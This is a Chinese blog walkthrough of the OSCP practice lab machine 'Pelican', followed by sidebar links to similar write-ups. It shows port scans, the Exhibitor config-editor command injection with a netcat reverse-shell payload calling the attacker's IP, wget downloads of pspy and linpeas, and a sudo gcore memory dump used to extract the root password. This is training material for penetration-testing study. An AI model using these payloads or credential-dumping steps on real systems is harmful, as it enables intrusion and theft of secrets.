OSCP考试靶机练习---Pelican

原创 已于 2025-04-18 18:05:18 修改 · 863 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2025-04-18 15:25:07 首次发布

拿shell阶段

先端口扫描:
TCP:

nmap -sC -sV -p- -T4 -n 192.168.226.98

扫描结果

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp  open  zookeeper   Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
8080/tcp  open  http        Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp  open  http        nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.226.98:8080/exhibitor/v1/ui/index.html
39605/tcp open  java-rmi    Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP:
主要是看SNMP端口是否开启,一般是161端口

sudo nmap -Pn -n 192.168.226.98 -sU --top-ports=100 --reason

PORT     STATE         SERVICE  REASON
631/udp  open|filtered ipp      no-response
5353/udp open          zeroconf udp-response ttl 252

445 smb共享枚举

smbclient --no-pass -L //192.168.226.98

在这里插入图片描述

8081端口

跳转

http://192.168.226.98:8080/exhibitor/v1/ui/index.html

在这里插入图片描述
发现版本号V1.0,可以查询漏洞,经过搜索
An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1.
1.0.9 至 1.7.1 版参展商 Web UI 的配置编辑器中存在可被利用的命令注入漏洞。可在编辑器中插入由反拨号或 $() 包围的任意 shell 命令,并在启动 ZooKeeper 时由参展商进程执行。攻击者可作为运行参展商进程的用户执行任何命令。
可能存在CVE-2019-5029

利用步骤:

https://www.exploit-db.com/exploits/48654

payload:

$(/bin/nc -e /bin/sh 192.168.45.183 445 &)

利用步骤:
在这里插入图片描述
根据上文步骤进行利用
在这里插入图片描述
拿到shell

提权

枚举

kali :python3 -m http.server 80
上传工具
wget http://192.168.45.183/pspy64
wget http://192.168.45.183/linpeas.sh

在这里插入图片描述
运行./pspy64,看看能不能捕获一些敏感信息
发现root,一直运行这个:
/bin/sh -c while true; do chown -R charles:charles /opt/zookeeper && chown -R charles:charles /opt/exhibitor && sleep 1; done

在这里插入图片描述
Linux chown(英文全拼:change owner)命令用于设置文件所有者和文件关联组的命令。
chown命令,
大概是将/opt/zookeeper和/opt/exhibitor的所有权修改为,所有文件与子目录的拥有者皆设为 charles,群体的使用者 charles:

再使用./linpeas.sh枚举:
发现sudo -l

在这里插入图片描述
利用网站
https://gtfobins.github.io/gtfobins/gcore/
在这里插入图片描述

It can be used to generate core dumps of running processes. Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named core.$PID, that is then often filtered with strings to narrow down relevant information.
可以针对运行的进程,生成一个二进制文件,主要用于敏感文件查找,那我们详细查看一下现在运行的进程

发现
/usr/bin/password-store 进过goolge好像是一个密码管理器,可能有敏感文件
在这里插入图片描述
使用gcore:
sudo /usr/bin/gcore -a 513
在这里插入图片描述
查看生成的二进制文件

strings core.513

发现root密码
在这里插入图片描述

su

提权成功
在这里插入图片描述

OSCP-Challenge 1 - Medtech
羽的博客
03-14 5708
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就简单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
OSCP 2021攻略之旅--从小白到通过
热门推荐
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1798
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
Oscp练习
weixin_44126257的博客
02-11 408
Oscp练习
oscp练习目录
王嘟嘟的博客
01-25 1万+
0x00 前言 这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。 0x01 vulnhub总览 题目 链接 文章链接 Me and My Girlfriend 1 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ https://blog.youkuaiyun.com/qq_36...
靶场实战(20):OSCP备考之内网靶场红日7
OneMoreThink
03-06 1417
欢迎提出建议、欢迎分享文章、欢迎关注公众号 OneMoreThink 。目录第一层网络(10.58.81.0/24)VPN/Wi-Fi(10.58.81.108)获取权限Web1(10.58.81.107)获取权限搭建隧道第二层网络(192.168.52.0/24)PC1(192.168.52.30)获取权限搭建隧道信息收集Web2(192.168.52.20)获取权限提升权限容器逃逸第三层网络(...
OSCP靶机16--loly
faclon666的博客
05-12 1822
Linux服务器所部署的CMS- wordpress框架的插件—AdRotate有文件上传漏洞,允许用户上传可执行文件。导致服务器可以被攻击者获取低权限用户,wordpress的配置文件wp-config.php中包含loly用户的密码,所以攻击者可以切换到权限更高的用户loly。Linux服务器有[CVE-2017-16995] eBPF_verifier漏洞,所以使用loly用户运行对应脚本后,获得该服务器最高权限。(当然此处不是用的脏牛漏洞,我只是CV了之前的命令,没有修改名字。
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 404
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
oscp靶机教程
weixin_68723119的博客
08-13 697
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
OSCP打靶日常训练之Tr0ll:卧槽!有坑!
weixin_74543604的博客
12-25 424
学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!这次靶场主要用到的就是一个FTP的匿名登陆漏洞,登录到FTP后找到其流量包进行流量分析,找到隐藏的文件,在其中找到相对应的用户名密码进行海德拉爆破登录,再查看其内核版本进行提权,迷惑人的点在于那沟槽的密码,非常误导人。攻击机:kali ip地址192.168.66.141。
oscp_靶场练习_Brainfuck
qq_33168924的博客
02-23 685
OSCP_靶场练习_Brainfuck
oscp—Me and My Girlfriend 1练习
王嘟嘟的博客
01-12 1347
0x00 前言 为oscp做准备的练习,Me and My Girlfriend 1。由于不知道怎么练习,就随便下载了一个进行练习在这里做一个笔记。 0x01 实验 下载好文件之后,配置为NET模式。 1.目标探测 探测这里使用了nmap进行探测,可以看到时间为10.4秒。 nmap -sP -T4 192.168.25.1/24 这里也可以使用masscan 进行扫描,可以明显感觉速度变快了...
oscp——five86: 2
王嘟嘟的博客
01-19 856
0x00 前言 这个是练习的第9个机子。接着做five86: 2,实际上由于各种原因,我是在并行做两个机子。 0x01 实验 1.信息收集 1.1 ip 1.2 端口 2.攻击尝试 2.1 端口攻击尝试 21可以爆破,但是这里不优先进行爆破这个 2.2 web攻击尝试 打开访问之后(hosts绑定了的),发现是一个wp的站。之前做过,所以直接上wpscan 扫出来了几个用户 使用字典跑一下...
OSCP靶机练习--CuteNews02
一杯咖啡的渗透记忆
05-20 1153
2. POC脚本修改 POC的脚本通常是通用脚本,很多时候是不满足具体的环境要求的,所以打开这个python脚本,可以看到跟我们的目前的环境路径不一致,多了一个/CuteNews/这个文件路径,将代码包含有这个路径的代码都去掉。然后再整体check一下。这边POC里面的payload我是没有做任何修改的,里面的payload你们也可以根据自己的需求和喜欢来进行修改。 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8742
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
工业自动化领域中步科触摸屏与台达VFD-M变频器通讯实现电机控制功能 - 电机控制
最新发布
07-29
内容概要:本文档详细介绍了使用步科触摸屏和台达VFD-M变频器实现电机控制功能的技术细节。主要内容涵盖所需的硬件配置(如步科T070触摸屏和支持485功能的USB转485转换头),以及具体的功能实现方法,包括正反转控制、点动停止、频率设定、运行频率读取、电流电压和运行状态的监控。此外,还强调了通讯协议的重要性及其具体实施步骤。 适用人群:从事工业自动化领域的工程师和技术人员,特别是那些负责电机控制系统设计和维护的专业人士。 使用场景及目标:适用于需要集成步科触摸屏与台达VFD-M变频器进行电机控制的应用场合,旨在帮助技术人员掌握正确的硬件选型、安装配置及编程技巧,从而确保系统的稳定性和可靠性。 其他说明:文中提到的操作流程和注意事项有助于避免常见的错误并提高工作效率。同时,提供了详细的通讯说明,确保不同设备之间的兼容性和数据传输的准确性。
langchain4j-community-core-1.0.0-beta4.jar中文-英文对照文档.zip
07-29
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值